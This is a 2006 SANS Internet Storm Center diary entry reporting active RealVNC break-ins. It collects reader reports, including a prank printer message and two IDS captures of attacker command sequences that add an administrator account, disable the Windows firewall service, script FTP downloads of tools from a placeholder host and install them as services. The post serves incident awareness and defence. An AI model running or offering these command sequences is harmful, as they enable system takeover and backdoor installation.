Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - RealVNC exploits in the wild InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

RealVNC exploits in the wild

Published: 2006-05-19
Last Updated: 2006-05-19 10:35:46 UTC
by Swa Frantzen (Version: 3)
0 comment(s)
Active use of RealVNC to break into systems is being reported to us.

If you can share more details or just can report attempts, please let us know.

If you have any RealVNC exposed, check if you are hacked, and if not take measures immediately. If you want an inherently more secure solution check how to run vnc over ssh on your specific platform.

See more of the vulnerability in the May 15th diary by Kyle Haugsness.

[updates below]
List of exploits reported to us by our readers:
  • Austin from the UK reports that all shared printers in his office stated to print:
Dear Network Administrator. 

Please do not be alarmed.
My team is network security specialist.

You are using a vulnerable version of VNC.
Please upgrade your version soon.

We have not accessed your data but we could have.
Have a nice day

The intrusion reportedly happened on a workstation where a visitor left a VNC server running.

He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
  • An Anonymous report about the installation of typical tools installed by the warez and hacker crowd such as Serv-U and pwdump.

  • Mike reported on a machine getting hacked and sent us what his IDS caught of it:
    net user [user] [pass] /ADD
    net localgroup Administrators [user] /ADD
    net stop sharedaccess
    sc delete sharedaccess
    echo open [IP] [port]  > ftptmp
    echo user [ftpuserinfo] >> ftptmp
    echo get usercontrol.exe  >> ftptmp
    echo get helpservice.svc  >> ftptmp
    echo get JAcheck.ini  >> ftptmp
    echo get JAcheck.dll  >> ftptmp
    echo bye  >> ftptmp
    ftp -n -s:ftptmp
    del ftptmp
    usercontrol /i
    net start "ms system service"
Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. Perhaps more happened earlier, happens later, or just was not caught.
  • An anonymous user reports: "We have been using RealVNC 4.1.1 and have been experiencing successful unauthorized connections to our machines. Also, we have seen increased traffic on our network which looks like scanning, some network printers have also been printing pages of gibberish." He concluded with "We are currently upgrading all VNC servers to 4.1.2."

  • Another anonymously reported attack that was done on port 5900 (also an IDS capture), so the RealVNC angle is only an assumption at this point:
    cd %WINDIR%\system32
    echo open [IP] [PORT] >>ms32
    echo [user] >>ms32
    echo [pass] >>ms32
    echo get pack.exe>>ms32
    echo get Iass.exe>>ms32
    echo get mssd.ini>>ms32
    echo get fport.exe>>ms32
    echo get op.exe>>ms32
    echo get pskill.exe>>ms32
    echo bye>>ms32
    ftp -v -s:ms32
    Iass.exe /I
    net start dnsd

It sure looks like these machines are slowly getting owned one by one ...

Swa Frantzen -- Section 66
0 comment(s)
Diary Archives